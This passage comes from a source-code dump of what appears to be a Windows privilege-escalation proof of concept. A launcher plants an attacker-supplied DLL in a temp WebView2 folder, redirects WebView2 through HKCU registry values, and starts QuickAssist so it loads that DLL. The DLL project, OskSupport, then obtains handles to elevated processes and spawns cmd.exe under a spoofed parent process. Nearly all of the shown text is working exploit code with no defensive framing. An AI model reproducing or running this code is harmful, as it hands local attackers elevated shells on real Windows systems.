119 |     lstrcatW(path, WEBVIEW_DIR);
120 |     dir1_len = lstrlenW(path);
121 |     if (!CreateDirectoryW(path, NULL))
122 |     {
123 |         return FALSE;
124 |     }
125 |     lstrcatW(path, ARCH_DIR);
126 |     dir2_len = lstrlenW(path);
127 |     if (!CreateDirectoryW(path, NULL))
128 |     {
129 |         path[dir1_len] = L'\0';
130 |         RemoveDirectoryW(path);
131 |         return FALSE;
132 |     }
133 |     lstrcatW(path, WEBVIEW_DLL);
134 |     if (!CopyFileW(dll_path, path, FALSE))
135 |     {
136 |         path[dir2_len] = L'\0';
137 |         RemoveDirectoryW(path);
138 |         path[dir1_len] = L'\0';
139 |         RemoveDirectoryW(path);
140 |         return FALSE;
141 |     }
142 |     AddWebView2VersionInfo(path);
143 |     return TRUE;
144 | }
145 | 
146 | static BOOL RestoreWebView()
147 | {
148 |     HKEY key = NULL;
149 |     BOOL ret = FALSE;
150 | 
151 |     if (!RegOpenKeyExW(HKEY_CURRENT_USER, WEBVIEW_POLICY_KEY, 0, KEY_SET_VALUE, &key))
152 |     {
153 |         if (!RegDeleteValueW(key, WEBVIEW_POLICY_VALUE))
154 |         {
155 |             ret = TRUE;
156 |         }
157 |         RegCloseKey(key);
158 |     }
159 |     if (!RegOpenKeyExW(HKEY_CURRENT_USER, FALLBACK_ENVKEY, 0, KEY_SET_VALUE, &key))
160 |     {
161 |         if (!RegDeleteValueW(key, FALLBACK_ENVVAR))
162 |         {
163 |             ret = TRUE;
164 |         }
165 |         RegCloseKey(key);
166 |     }
167 |     return ret;
168 | }
169 | 
170 | static BOOL RelayWebView(const WCHAR* webview_path)
171 | {
172 |     HKEY key = NULL;
173 | 
174 |     if (!webview_path)
175 |     {
176 |         return FALSE;
177 |     }
178 | 
179 |     if (!RegCreateKeyExW(HKEY_CURRENT_USER, WEBVIEW_POLICY_KEY, 0, NULL, REG_OPTION_VOLATILE, MAXIMUM_ALLOWED, NULL, &key, NULL))
180 |     {
181 |         if (!RegSetValueExW(key, WEBVIEW_POLICY_VALUE, 0, REG_SZ, (const BYTE*)webview_path, lstrlenW(webview_path) * sizeof(WCHAR) + sizeof(WCHAR)))
182 |         {
183 |             RegCloseKey(key);
184 |             return TRUE;
185 |         }
186 |         RegCloseKey(key);
187 |     }
188 |     if (!RegOpenKeyExW(HKEY_CURRENT_USER, FALLBACK_ENVKEY, 0, KEY_SET_VALUE, &key))
189 |     {
190 |         if (!RegSetValueExW(key, FALLBACK_ENVVAR, 0, REG_SZ, (const BYTE*)webview_path, lstrlenW(webview_path) * sizeof(WCHAR) + sizeof(WCHAR)))
191 |         {
192 |             RegCloseKey(key);
193 |             return TRUE;
194 |         }
195 |         RegCloseKey(key);
196 |     }
197 |     return FALSE;
198 | }
199 | 
200 | static HANDLE RunQuickAssist()
201 | {
202 |     //WCHAR quickassist_path[MAX_PATH] = { 0 };
203 |     SHELLEXECUTEINFOW sei = {0};
204 | 
205 |     //memset(&quickassist_path[0], 0, sizeof(quickassist_path));
206 |     //if (!GetSystemDirectoryW(quickassist_path, MAX_PATH - 14))
207 |     //{
208 |     //    return NULL;
209 |     //}
210 |     //lstrcatW(quickassist_path, QUICKASSIST_BIN);
211 | 
212 |     memset(&sei, 0, sizeof(sei));
213 |     sei.cbSize = sizeof(sei);
214 |     sei.fMask = SEE_MASK_NOCLOSEPROCESS;
215 |     sei.lpVerb = NULL;
216 |     sei.lpParameters = NULL;
217 |     sei.nShow = SW_MINIMIZE;
218 | 
219 |     //if (GetFileAttributesW(quickassist_path) != INVALID_FILE_ATTRIBUTES)
220 |     //{
221 |     //    sei.lpFile = quickassist_path;
222 |     //}
223 |     //else
224 |     //{
225 |         sei.lpFile = QUICKASSIST_PROTOCOL;
226 |     //}
227 | 
228 |     if (ShellExecuteExW(&sei))
229 |     {
230 |         return sei.hProcess;
231 |     }
232 | 
233 |     return NULL;
234 | }
235 | 
236 | static BOOL KillQuickAssist(HANDLE process)
237 | {
238 |     return TerminateProcess(process, 0);
239 | }
240 | 
241 | int wmain(int argc, WCHAR** argv)
242 | {
243 |     DWORD inet_state = 0;
244 |     WCHAR tmppath[200] = { 0 };
245 |     HANDLE process = NULL;
246 | 
247 |     if (argc < 2)
248 |     {
249 |         wprintf(L"Usage: %ls [path_to_dll]\n", argv[0]);
250 |         return 1;
251 |     }
252 | 
253 |     wprintf(L"Get temp path ...\n");
254 |     if (!GetTempPathW(200, tmppath))
255 |     {
256 |         return 1;
257 |     }
258 |     wprintf(L"Use temp path for WebView base path: %ls\n", tmppath);
259 |     wprintf(L"Copy DLL \"%ls\" to \"%ls%ls%ls%ls\"\n", argv[1], tmppath, WEBVIEW_DIR, ARCH_DIR, WEBVIEW_DLL);
260 |     if (!CopyDLLForWebView(tmppath, argv[1]))
261 |     {
262 |         return 1;
263 |     }
264 |     wprintf(L"Relay WebView folder to: %ls\n", tmppath);
265 |     if (!RelayWebView(tmppath))
266 |     {
267 |         RemoveDLLForWebView(tmppath);
268 |         return 1;
269 |     }
270 |     wprintf(L"Start QuickAssist ...\n");
271 |     process = RunQuickAssist();
272 |     if (!process)
273 |     {
274 |         RestoreWebView();
275 |         RemoveDLLForWebView(tmppath);
276 |         return 1;
277 |     }
278 |     wprintf(L"Wait for QuickAssist to exit ...\n");
279 |     if (WaitForSingleObject(process, 15000) != WAIT_OBJECT_0)
280 |     {
281 |         KillQuickAssist(process);
282 |         CloseHandle(process);
283 |         RestoreWebView();
284 |         Sleep(100);
285 |         RemoveDLLForWebView(tmppath);
286 |         return 1;
287 |     }
288 |     wprintf(L"QuickAssist closed\n");
289 |     CloseHandle(process);
290 |     RestoreWebView();
291 |     RemoveDLLForWebView(tmppath);
292 | 
293 |     return 0;
294 | }
295 | 


--------------------------------------------------------------------------------
/OskSupport/OskSupport.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>17.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{364fc33a-0d3f-4d16-8f12-c8b4790bf1a0}</ProjectGuid>
 25 |     <RootNamespace>OskSupport</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v143</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v143</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v143</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v143</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 74 |     <TargetName>OskSupport</TargetName>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 77 |     <TargetName>OskSupport</TargetName>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 80 |     <TargetName>OskSupport</TargetName>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <TargetName>OskSupport</TargetName>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <WarningLevel>Level3</WarningLevel>
 88 |       <SDLCheck>true</SDLCheck>
 89 |       <PreprocessorDefinitions>WIN32;_DEBUG;OSKSUPPORT_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 90 |       <ConformanceMode>true</ConformanceMode>
 91 |       <PrecompiledHeader>NotUsing</PrecompiledHeader>
 92 |       <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
 93 |       <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
 94 |     </ClCompile>
 95 |     <Link>
 96 |       <SubSystem>Windows</SubSystem>
 97 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 98 |       <EnableUAC>false</EnableUAC>
 99 |     </Link>
100 |   </ItemDefinitionGroup>
101 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
102 |     <ClCompile>
103 |       <WarningLevel>Level3</WarningLevel>
104 |       <FunctionLevelLinking>true</FunctionLevelLinking>
105 |       <IntrinsicFunctions>true</IntrinsicFunctions>
106 |       <SDLCheck>true</SDLCheck>
107 |       <PreprocessorDefinitions>WIN32;NDEBUG;OSKSUPPORT_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
108 |       <ConformanceMode>true</ConformanceMode>
109 |       <PrecompiledHeader>NotUsing</PrecompiledHeader>
110 |       <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
111 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
112 |     </ClCompile>
113 |     <Link>
114 |       <SubSystem>Windows</SubSystem>
115 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
116 |       <OptimizeReferences>true</OptimizeReferences>
117 |       <GenerateDebugInformation>true</GenerateDebugInformation>
118 |       <EnableUAC>false</EnableUAC>
119 |     </Link>
120 |   </ItemDefinitionGroup>
121 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
122 |     <ClCompile>
123 |       <WarningLevel>Level3</WarningLevel>
124 |       <SDLCheck>true</SDLCheck>
125 |       <PreprocessorDefinitions>_DEBUG;OSKSUPPORT_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
126 |       <ConformanceMode>true</ConformanceMode>
127 |       <PrecompiledHeader>NotUsing</PrecompiledHeader>
128 |       <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
129 |       <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
130 |     </ClCompile>
131 |     <Link>
132 |       <SubSystem>Windows</SubSystem>
133 |       <GenerateDebugInformation>true</GenerateDebugInformation>
134 |       <EnableUAC>false</EnableUAC>
135 |     </Link>
136 |   </ItemDefinitionGroup>
137 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
138 |     <ClCompile>
139 |       <WarningLevel>Level3</WarningLevel>
140 |       <FunctionLevelLinking>true</FunctionLevelLinking>
141 |       <IntrinsicFunctions>true</IntrinsicFunctions>
142 |       <SDLCheck>true</SDLCheck>
143 |       <PreprocessorDefinitions>NDEBUG;OSKSUPPORT_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
144 |       <ConformanceMode>true</ConformanceMode>
145 |       <PrecompiledHeader>NotUsing</PrecompiledHeader>
146 |       <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
147 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
148 |     </ClCompile>
149 |     <Link>
150 |       <SubSystem>Windows</SubSystem>
151 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
152 |       <OptimizeReferences>true</OptimizeReferences>
153 |       <GenerateDebugInformation>true</GenerateDebugInformation>
154 |       <EnableUAC>false</EnableUAC>
155 |     </Link>
156 |   </ItemDefinitionGroup>
157 |   <ItemGroup>
158 |     <None Include="cpp.hint" />
159 |   </ItemGroup>
160 |   <ItemGroup>
161 |     <ClCompile Include="dllmain.c" />
162 |     <ClCompile Include="OpLock.c" />
163 |   </ItemGroup>
164 |   <ItemGroup>
165 |     <ClInclude Include="OpLock.h" />
166 |   </ItemGroup>
167 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
168 |   <ImportGroup Label="ExtensionTargets">
169 |   </ImportGroup>
170 | </Project>


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
  1 | ## Ignore Visual Studio temporary files, build results, and
  2 | ## files generated by popular Visual Studio add-ons.
  3 | ##
  4 | ## Get latest from https://github.com/github/gitignore/blob/main/VisualStudio.gitignore
  5 | 
  6 | # User-specific files
  7 | *.rsuser
  8 | *.suo
  9 | *.user
 10 | *.userosscache
 11 | *.sln.docstates
 12 | 
 13 | # User-specific files (MonoDevelop/Xamarin Studio)
 14 | *.userprefs
 15 | 
 16 | # Mono auto generated files
 17 | mono_crash.*
 18 | 
 19 | # Build results
 20 | [Dd]ebug/
 21 | [Dd]ebugPublic/
 22 | [Rr]elease/
 23 | [Rr]eleases/
 24 | x64/
 25 | x86/
 26 | [Ww][Ii][Nn]32/
 27 | [Aa][Rr][Mm]/
 28 | [Aa][Rr][Mm]64/
 29 | bld/
 30 | [Bb]in/
 31 | [Oo]bj/
 32 | [Ll]og/
 33 | [Ll]ogs/
 34 | 
 35 | # Visual Studio 2015/2017 cache/options directory
 36 | .vs/
 37 | # Uncomment if you have tasks that create the project's static files in wwwroot
 38 | #wwwroot/
 39 | 
 40 | # Visual Studio 2017 auto generated files
 41 | Generated\ Files/
 42 | 
 43 | # MSTest test Results
 44 | [Tt]est[Rr]esult*/
 45 | [Bb]uild[Ll]og.*
 46 | 
 47 | # NUnit
 48 | *.VisualState.xml
 49 | TestResult.xml
 50 | nunit-*.xml
 51 | 
 52 | # Build Results of an ATL Project
 53 | [Dd]ebugPS/
 54 | [Rr]eleasePS/
 55 | dlldata.c
 56 | 
 57 | # Benchmark Results
 58 | BenchmarkDotNet.Artifacts/
 59 | 
 60 | # .NET Core
 61 | project.lock.json
 62 | project.fragment.lock.json
 63 | artifacts/
 64 | 
 65 | # ASP.NET Scaffolding
 66 | ScaffoldingReadMe.txt
 67 | 
 68 | # StyleCop
 69 | StyleCopReport.xml
 70 | 
 71 | # Files built by Visual Studio
 72 | *_i.c
 73 | *_p.c
 74 | *_h.h
 75 | *.ilk
 76 | *.meta
 77 | *.obj
 78 | *.iobj
 79 | *.pch
 80 | *.pdb
 81 | *.ipdb
 82 | *.pgc
 83 | *.pgd
 84 | *.rsp
 85 | # but not Directory.Build.rsp, as it configures directory-level build defaults
 86 | !Directory.Build.rsp
 87 | *.sbr
 88 | *.tlb
 89 | *.tli
 90 | *.tlh
 91 | *.tmp
 92 | *.tmp_proj
 93 | *_wpftmp.csproj
 94 | *.log
 95 | *.tlog
 96 | *.vspscc
 97 | *.vssscc
 98 | .builds
 99 | *.pidb
100 | *.svclog
101 | *.scc
102 | 
103 | # Chutzpah Test files
104 | _Chutzpah*
105 | 
106 | # Visual C++ cache files
107 | ipch/
108 | *.aps
109 | *.ncb
110 | *.opendb
111 | *.opensdf
112 | *.sdf
113 | *.cachefile
114 | *.VC.db
115 | *.VC.VC.opendb
116 | 
117 | # Visual Studio profiler
118 | *.psess
119 | *.vsp
120 | *.vspx
121 | *.sap
122 | 
123 | # Visual Studio Trace Files
124 | *.e2e
125 | 
126 | # TFS 2012 Local Workspace
127 | $tf/
128 | 
129 | # Guidance Automation Toolkit
130 | *.gpState
131 | 
132 | # ReSharper is a .NET coding add-in
133 | _ReSharper*/
134 | *.[Rr]e[Ss]harper
135 | *.DotSettings.user
136 | 
137 | # TeamCity is a build add-in
138 | _TeamCity*
139 | 
140 | # DotCover is a Code Coverage Tool
141 | *.dotCover
142 | 
143 | # AxoCover is a Code Coverage Tool
144 | .axoCover/*
145 | !.axoCover/settings.json
146 | 
147 | # Coverlet is a free, cross platform Code Coverage Tool
148 | coverage*.json
149 | coverage*.xml
150 | coverage*.info
151 | 
152 | # Visual Studio code coverage results
153 | *.coverage
154 | *.coveragexml
155 | 
156 | # NCrunch
157 | _NCrunch_*
158 | .*crunch*.local.xml
159 | nCrunchTemp_*
160 | 
161 | # MightyMoose
162 | *.mm.*
163 | AutoTest.Net/
164 | 
165 | # Web workbench (sass)
166 | .sass-cache/
167 | 
168 | # Installshield output folder
169 | [Ee]xpress/
170 | 
171 | # DocProject is a documentation generator add-in
172 | DocProject/buildhelp/
173 | DocProject/Help/*.HxT
174 | DocProject/Help/*.HxC
175 | DocProject/Help/*.hhc
176 | DocProject/Help/*.hhk
177 | DocProject/Help/*.hhp
178 | DocProject/Help/Html2
179 | DocProject/Help/html
180 | 
181 | # Click-Once directory
182 | publish/
183 | 
184 | # Publish Web Output
185 | *.[Pp]ublish.xml
186 | *.azurePubxml
187 | # Note: Comment the next line if you want to checkin your web deploy settings,
188 | # but database connection strings (with potential passwords) will be unencrypted
189 | *.pubxml
190 | *.publishproj
191 | 
192 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
193 | # checkin your Azure Web App publish settings, but sensitive information contained
194 | # in these scripts will be unencrypted
195 | PublishScripts/
196 | 
197 | # NuGet Packages
198 | *.nupkg
199 | # NuGet Symbol Packages
200 | *.snupkg
201 | # The packages folder can be ignored because of Package Restore
202 | **/[Pp]ackages/*
203 | # except build/, which is used as an MSBuild target.
204 | !**/[Pp]ackages/build/
205 | # Uncomment if necessary however generally it will be regenerated when needed
206 | #!**/[Pp]ackages/repositories.config
207 | # NuGet v3's project.json files produces more ignorable files
208 | *.nuget.props
209 | *.nuget.targets
210 | 
211 | # Microsoft Azure Build Output
212 | csx/
213 | *.build.csdef
214 | 
215 | # Microsoft Azure Emulator
216 | ecf/
217 | rcf/
218 | 
219 | # Windows Store app package directories and files
220 | AppPackages/
221 | BundleArtifacts/
222 | Package.StoreAssociation.xml
223 | _pkginfo.txt
224 | *.appx
225 | *.appxbundle
226 | *.appxupload
227 | 
228 | # Visual Studio cache files
229 | # files ending in .cache can be ignored
230 | *.[Cc]ache
231 | # but keep track of directories ending in .cache
232 | !?*.[Cc]ache/
233 | 
234 | # Others
235 | ClientBin/
236 | ~$*
237 | *~
238 | *.dbmdl
239 | *.dbproj.schemaview
240 | *.jfm
241 | *.pfx
242 | *.publishsettings
243 | orleans.codegen.cs
244 | 
245 | # Including strong name files can present a security risk
246 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
247 | #*.snk
248 | 
249 | # Since there are multiple workflows, uncomment next line to ignore bower_components
250 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
251 | #bower_components/
252 | 
253 | # RIA/Silverlight projects
254 | Generated_Code/
255 | 
256 | # Backup & report files from converting an old project file
257 | # to a newer Visual Studio version. Backup files are not needed,
258 | # because we have git ;-)
259 | _UpgradeReport_Files/
260 | Backup*/
261 | UpgradeLog*.XML
262 | UpgradeLog*.htm
263 | ServiceFabricBackup/
264 | *.rptproj.bak
265 | 
266 | # SQL Server files
267 | *.mdf
268 | *.ldf
269 | *.ndf
270 | 
271 | # Business Intelligence projects
272 | *.rdl.data
273 | *.bim.layout
274 | *.bim_*.settings
275 | *.rptproj.rsuser
276 | *- [Bb]ackup.rdl
277 | *- [Bb]ackup ([0-9]).rdl
278 | *- [Bb]ackup ([0-9][0-9]).rdl
279 | 
280 | # Microsoft Fakes
281 | FakesAssemblies/
282 | 
283 | # GhostDoc plugin setting file
284 | *.GhostDoc.xml
285 | 
286 | # Node.js Tools for Visual Studio
287 | .ntvs_analysis.dat
288 | node_modules/
289 | 
290 | # Visual Studio 6 build log
291 | *.plg
292 | 
293 | # Visual Studio 6 workspace options file
294 | *.opt
295 | 
296 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
297 | *.vbw
298 | 
299 | # Visual Studio 6 auto-generated project file (contains which files were open etc.)
300 | *.vbp
301 | 
302 | # Visual Studio 6 workspace and project file (working project files containing files to include in project)
303 | *.dsw
304 | *.dsp
305 | 
306 | # Visual Studio 6 technical files
307 | *.ncb
308 | *.aps
309 | 
310 | # Visual Studio LightSwitch build output
311 | **/*.HTMLClient/GeneratedArtifacts
312 | **/*.DesktopClient/GeneratedArtifacts
313 | **/*.DesktopClient/ModelManifest.xml
314 | **/*.Server/GeneratedArtifacts
315 | **/*.Server/ModelManifest.xml
316 | _Pvt_Extensions
317 | 
318 | # Paket dependency manager
319 | .paket/paket.exe
320 | paket-files/
321 | 
322 | # FAKE - F# Make
323 | .fake/
324 | 
325 | # CodeRush personal settings
326 | .cr/personal
327 | 
328 | # Python Tools for Visual Studio (PTVS)
329 | __pycache__/
330 | *.pyc
331 | 
332 | # Cake - Uncomment if you are using it
333 | # tools/**
334 | # !tools/packages.config
335 | 
336 | # Tabs Studio
337 | *.tss
338 | 
339 | # Telerik's JustMock configuration file
340 | *.jmconfig
341 | 
342 | # BizTalk build output
343 | *.btp.cs
344 | *.btm.cs
345 | *.odx.cs
346 | *.xsd.cs
347 | 
348 | # OpenCover UI analysis results
349 | OpenCover/
350 | 
351 | # Azure Stream Analytics local run output
352 | ASALocalRun/
353 | 
354 | # MSBuild Binary and Structured Log
355 | *.binlog
356 | 
357 | # NVidia Nsight GPU debugger configuration file
358 | *.nvuser
359 | 
360 | # MFractors (Xamarin productivity tool) working folder
361 | .mfractor/
362 | 
363 | # Local History for Visual Studio
364 | .localhistory/
365 | 
366 | # Visual Studio History (VSHistory) files
367 | .vshistory/
368 | 
369 | # BeatPulse healthcheck temp database
370 | healthchecksdb
371 | 
372 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
373 | MigrationBackup/
374 | 
375 | # Ionide (cross platform F# VS Code tools) working folder
376 | .ionide/
377 | 
378 | # Fody - auto-generated XML schema
379 | FodyWeavers.xsd
380 | 
381 | # VS Code files for those working on multiple tools
382 | .vscode/*
383 | !.vscode/settings.json
384 | !.vscode/tasks.json
385 | !.vscode/launch.json
386 | !.vscode/extensions.json
387 | *.code-workspace
388 | 
389 | # Local History for Visual Studio Code
390 | .history/
391 | 
392 | # Windows Installer files from build outputs
393 | *.cab
394 | *.msi
395 | *.msix
396 | *.msm
397 | *.msp
398 | 
399 | # JetBrains Rider
400 | *.sln.iml
401 | 


--------------------------------------------------------------------------------
/OskSupport/dllmain.c:
--------------------------------------------------------------------------------
  1 | #include <Windows.h>
  2 | 
  3 | #include "OpLock.h"
  4 | 
  5 | #define PAYLOAD_CMD L"cmd.exe"
  6 | 
  7 | __declspec(dllexport) void InitializeOSKSupport()
  8 | {
  9 | }
 10 | 
 11 | __declspec(dllexport) void UninitializeOSKSupport()
 12 | {
 13 | }
 14 | 
 15 | __declspec(dllexport) void DoMsCtfMonitor()
 16 | {
 17 | }
 18 | 
 19 | static BOOL CreateProcessWithParentW(WCHAR* cmdline, HANDLE parent, DWORD dwFlags, WORD wShow, PROCESS_INFORMATION* pi)
 20 | {
 21 | 	SIZE_T ptsize = 0;
 22 | 	STARTUPINFOEXW si = { 0 };
 23 | 	LPPROC_THREAD_ATTRIBUTE_LIST ptal = NULL;
 24 | 	BOOL ret = FALSE;
 25 | 
 26 | 	if (!pi)
 27 | 	{
 28 | 		return FALSE;
 29 | 	}
 30 | 	InitializeProcThreadAttributeList(NULL, 1, 0, &ptsize);
 31 | 	ptal = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, ptsize);
 32 | 	if (!ptal)
 33 | 	{
 34 | 		return FALSE;
 35 | 	}
 36 | 	memset(&si, 0, sizeof(si));
 37 | 	si.StartupInfo.cb = sizeof(si);
 38 | 	si.StartupInfo.dwFlags = STARTF_FORCEOFFFEEDBACK | STARTF_USESHOWWINDOW;
 39 | 	si.StartupInfo.wShowWindow = wShow;
 40 | 	if (!InitializeProcThreadAttributeList(ptal, 1, 0, &ptsize))
 41 | 	{
 42 | 		HeapFree(GetProcessHeap(), 0, ptal);
 43 | 		return FALSE;
 44 | 	}
 45 | 	if (!UpdateProcThreadAttribute(ptal, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parent, sizeof(HANDLE), NULL, NULL))
 46 | 	{
 47 | 		DeleteProcThreadAttributeList(ptal);
 48 | 		HeapFree(GetProcessHeap(), 0, ptal);
 49 | 		return FALSE;
 50 | 	}
 51 | 	si.lpAttributeList = ptal;
 52 | 	ret = CreateProcessW(NULL, cmdline, NULL, NULL, FALSE, EXTENDED_STARTUPINFO_PRESENT | dwFlags, NULL, NULL, (STARTUPINFOW*)&si, pi);
 53 | 	DeleteProcThreadAttributeList(ptal);
 54 | 	HeapFree(GetProcessHeap(), 0, ptal);
 55 | 	return ret;
 56 | }
 57 | 
 58 | typedef HANDLE (WINAPI* __GetProcessHandleFromHwnd)(HWND hwnd);
 59 | 
 60 | static HANDLE CallGetProcessHandleFromHwnd(HWND hwnd)
 61 | {
 62 | 	HANDLE process = NULL;
 63 | 	HMODULE oleacc = NULL;
 64 | 	__GetProcessHandleFromHwnd _GetProcessHandleFromHwnd = NULL;
 65 | 
 66 | 	oleacc = LoadLibraryW(L"oleacc.dll");
 67 | 	if (oleacc)
 68 | 	{
 69 | 		_GetProcessHandleFromHwnd = (__GetProcessHandleFromHwnd)GetProcAddress(oleacc, "GetProcessHandleFromHwnd");
 70 | 		if (_GetProcessHandleFromHwnd)
 71 | 		{
 72 | 			process = _GetProcessHandleFromHwnd(hwnd);
 73 | 		}
 74 | 		FreeLibrary(oleacc);
 75 | 	}
 76 | 	return process;
 77 | }
 78 | 
 79 | static HANDLE GetHwndFullProcessHandle(HWND hwnd)
 80 | {
 81 | 	HANDLE process = NULL;
 82 | 	HANDLE dup = NULL;
 83 | 
 84 | 	process = CallGetProcessHandleFromHwnd(hwnd);
 85 | 	if (!process)
 86 | 	{
 87 | 		return NULL;
 88 | 	}
 89 | 	if (!DuplicateHandle(process, (HANDLE)-1, (HANDLE)-1, &dup, 0, FALSE, DUPLICATE_SAME_ACCESS))
 90 | 	{
 91 | 		CloseHandle(process);
 92 | 		return NULL;
 93 | 	}
 94 | 	CloseHandle(process);
 95 | 	return dup;
 96 | }
 97 | 
 98 | static BOOL EnumElevatedProcessHandle(HWND hwnd, LPARAM lparam)
 99 | {
100 | 	DWORD pid = 0;
101 | 	HANDLE process = NULL;
102 | 	HANDLE token = NULL;
103 | 	DWORD elevtype = 0;
104 | 	DWORD retlen = 0;
105 | 
106 | 	if (!lparam)
107 | 	{
108 | 		return FALSE;
109 | 	}
110 | 	GetWindowThreadProcessId(hwnd, &pid);
111 | 	if (!pid)
112 | 	{
113 | 		return TRUE;
114 | 	}
